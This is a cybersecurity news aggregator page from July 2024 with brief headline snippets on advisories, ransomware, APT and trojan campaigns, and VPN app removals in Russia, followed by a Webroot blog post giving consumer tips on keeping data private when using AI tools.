Red Hat Security Advisory 2024-4351-03 - An update for the virt:rhel and virt-devel:rhel modules is now available for Red Hat Enterprise Linux 8.6 Extended Update Support. Issues addressed include a use-after-free vulnerability.

 Feed

Apple removed a number of virtual private network (VPN) apps in Russia from its App Store on July 4, 2024, following a request by Russia's state communications watchdog Roskomnadzor, Russian news media reported. This includes the mobile apps of 25 VPN service providers, including ProtonVPN, Red Shield VPN, NordVPN and Le VPN, according to MediaZona. It's worth noting that NordVPN previously shut

 Feed

Four unpatched security flaws, including three critical ones, have been disclosed in the Gogs open-source, self-hosted Git service that could enable an authenticated attacker to breach susceptible instances, steal or wipe source code, and even plant backdoors. The vulnerabilities, according to SonarSource researchers Thomas Chauchefoin and Paul Gerste, are listed below - CVE-2024-39930 (CVSS

 Feed

Events like the recent massive CDK ransomware attack – which shuttered car dealerships across the U.S. in late June 2024 – barely raise public eyebrows anymore.  Yet businesses, and the people that lead them, are justifiably jittery. Every CISO knows that cybersecurity is an increasingly hot topic for executives and board members alike. And when the inevitable CISO/Board briefing rolls

 Feed

Financial institutions in Latin America are being threatened by a banking trojan called Mekotio (aka Melcoz). That's according to findings from Trend Micro, which said it recently observed a surge in cyber attacks distributing the Windows malware. Mekotio, known to be actively put to use since 2015, is known to target Latin American countries like Brazil, Chile, Mexico, Spain, Peru, and Portugal

 Feed

A previously undocumented advanced persistent threat (APT) group dubbed CloudSorcerer has been observed targeting Russian government entities by leveraging cloud services for command-and-control (C2) and data exfiltration. Cybersecurity firm Kaspersky, which discovered the activity in May 2024, the tradecraft adopted by the threat actor bears similarities with that of CloudWizard, but pointed

 Feed

An analysis of information-stealing malware logs published on the dark web has led to the discovery of thousands of consumers of child sexual abuse material (CSAM), indicating how such information could be used to combat serious crimes. "Approximately 3,300 unique users were found with accounts on known CSAM sources," Recorded Future said in a proof-of-concept (PoC) report published last week. "

 Feed

An emerging ransomware-as-a-service (RaaS) operation called Eldorado comes with locker variants to encrypt files on Windows and Linux systems. Eldorado first appeared on March 16, 2024, when an advertisement for the affiliate program was posted on the ransomware forum RAMP, Singapore-headquartered Group-IB said. The cybersecurity firm, which infiltrated the ransomware group, noted that its

 Threat Lab

In recognition of its profound impact, July 16 is celebrated as Artificial Intelligence (AI) Appreciation Day. AI is one of the defining technologies of our era, and its adoption is skyrocketing. People are using AI tools like OpenAI’s ChatGPT and Microsoft Copilot for a wide range of personal applications. Indeed,   show more ...

AI is integrated into various aspects of our daily lives — from AI-powered apps that assist with language translation and personal finance management to tools that help with creative writing and music composition. However, with the rapid growth of AI comes the pressing need to maintain privacy in our tech-driven world. As these intelligent systems become more capable and ubiquitous, they also collect vast amounts of data. Staying informed about the privacy practices of the AI tools you use and taking proactive steps to safeguard your information is crucial in navigating this new digital landscape. Here are some tips to help you keep your data private in our AI-enabled era: Understand the technologyImagine stepping into a futuristic world where robots and computers are your helpful companions. That’s our world today with AI! But as with any new tech, it’s crucial to know how it works. AI is evolving fast, so take some time to understand the basics. Knowing how AI algorithms function and the specific types of data they use is key to understanding how these systems make decisions. Know the vendor’s privacy practicesThink of using an AI tool like choosing a new roommate. You wouldn’t want to live with someone who’s careless with your belongings, right? The same goes for your data privacy. Before you start using any AI tool, look into how the company handles your information. Are they safeguarding it, or selling it off to the highest bidder? A little research can help you find AI tools that respect your privacy. Avoid inputting private dataAvoid sharing sensitive information like your address and phone number when interacting with AI tools. While it’s important to be cautious, remember that certain types of private data, such as preferences or non-sensitive information, can be safely shared with AI. Just as you wouldn’t divulge all your secrets to a new acquaintance, exercise discretion in what you share to ensure your privacy remains protected. Use strong passwordsThink of your passwords as the locks on your doors. Weak locks are easy to pick, while strong ones keep intruders out. Create strong, unique passwords for your accounts, and use a reputable password manager like Webroot to keep track of them. This way, you won’t have to remember each one, and you can rest easy knowing your accounts are secure. Keep software up-to-dateImagine driving a car with outdated brakes — scary, right? Using outdated software is just as risky. Keep your AI-powered devices and services up-to-date. Software updates often include security patches and bug fixes that keep your data safe and your devices running smoothly. Protect your devicesYour devices are like digital treasure chests, full of valuable information. Unfortunately, they’re also targets for cyber-attacks. AI-powered cyber threats are common and can wreak havoc on your systems. So strong antivirus protection is essential. Invest in a powerful solution like Webroot to keep the bad guys out and your devices safe. Use two-factor authenticationThink of two-factor authentication (2FA) as a double lock on your front door. It adds an extra layer of security by requiring a second form of verification, like a text message or an app notification, along with your password. Enabling 2FA on your accounts makes it much harder for someone to break in, even if they know your password. By following these tips, you can enjoy the wonders of AI without sacrificing your privacy. Stay informed, stay cautious, and stay protected! The future is bright with AI — just make sure you’re navigating it safely. Learn more about data protection. The post <strong>7 Tips on Keeping Your Data Private When Using AI</strong> appeared first on Webroot Blog.

2024-07
Aggregator history
Monday, July 08
MON
TUE
WED
THU
FRI
SAT
SUN
JulyAugustSeptember